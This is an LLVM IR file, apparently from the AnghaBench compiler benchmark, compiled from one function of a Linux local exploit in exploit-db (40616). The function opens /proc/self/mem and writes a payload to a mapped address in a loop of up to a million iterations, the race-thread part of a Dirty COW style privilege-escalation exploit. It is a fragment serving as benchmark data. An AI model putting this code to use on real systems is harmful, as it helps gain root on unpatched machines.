; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/linux/local/extr_40616.c_procselfmemThread.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/linux/local/extr_40616.c_procselfmemThread.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@.str = private unnamed_addr constant [15 x i8] c"/proc/self/mem\00", align 1
@O_RDWR = common dso_local global i32 0, align 4
@stop = common dso_local global i32 0, align 4
@map = common dso_local global i32 0, align 4
@SEEK_SET = common dso_local global i32 0, align 4
@sc_len = common dso_local global i32 0, align 4
@.str.1 = private unnamed_addr constant [16 x i8] c"thread stopped\0A\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i8* @procselfmemThread(i8* %0) #0 {
  %2 = alloca i8*, align 8
  %3 = alloca i8*, align 8
  %4 = alloca i8*, align 8
  %5 = alloca i32, align 4
  %6 = alloca i32, align 4
  %7 = alloca i32, align 4
  store i8* %0, i8** %3, align 8
  %8 = load i8*, i8** %3, align 8
  store i8* %8, i8** %4, align 8
  %9 = load i32, i32* @O_RDWR, align 4
  %10 = call i32 @open(i8* getelementptr inbounds ([15 x i8], [15 x i8]* @.str, i64 0, i64 0), i32 %9)
  store i32 %10, i32* %5, align 4
  store i32 0, i32* %7, align 4
  store i32 0, i32* %6, align 4
  br label %11

11:                                               ; preds = %33, %1
  %12 = load i32, i32* %6, align 4
  %13 = icmp slt i32 %12, 1000000
  br i1 %13, label %14, label %18

14:                                               ; preds = %11
  %15 = load i32, i32* @stop, align 4
  %16 = icmp ne i32 %15, 0
  %17 = xor i1 %16, true
  br label %18

18:                                               ; preds = %14, %11
  %19 = phi i1 [ false, %11 ], [ %17, %14 ]
  br i1 %19, label %20, label %36

20:                                               ; preds = %18
  %21 = load i32, i32* %5, align 4
  %22 = load i32, i32* @map, align 4
  %23 = load i32, i32* @SEEK_SET, align 4
  %24 = call i32 @lseek(i32 %21, i32 %22, i32 %23)
  %25 = load i32, i32* %5, align 4
  %26 = load i8*, i8** %4, align 8
  %27 = load i32, i32* @sc_len, align 4
  %28 = call i64 @write(i32 %25, i8* %26, i32 %27)
  %29 = load i32, i32* %7, align 4
  %30 = sext i32 %29 to i64
  %31 = add nsw i64 %30, %28
  %32 = trunc i64 %31 to i32
  store i32 %32, i32* %7, align 4
  br label %33

33:                                               ; preds = %20
  %34 = load i32, i32* %6, align 4
  %35 = add nsw i32 %34, 1
  store i32 %35, i32* %6, align 4
  br label %11

36:                                               ; preds = %18
  %37 = call i32 @printf(i8* getelementptr inbounds ([16 x i8], [16 x i8]* @.str.1, i64 0, i64 0))
  %38 = load i8*, i8** %2, align 8
  ret i8* %38
}

declare dso_local i32 @open(i8*, i32) #1

declare dso_local i32 @lseek(i32, i32, i32) #1

declare dso_local i64 @write(i32, i8*, i32) #1

declare dso_local i32 @printf(i8*) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
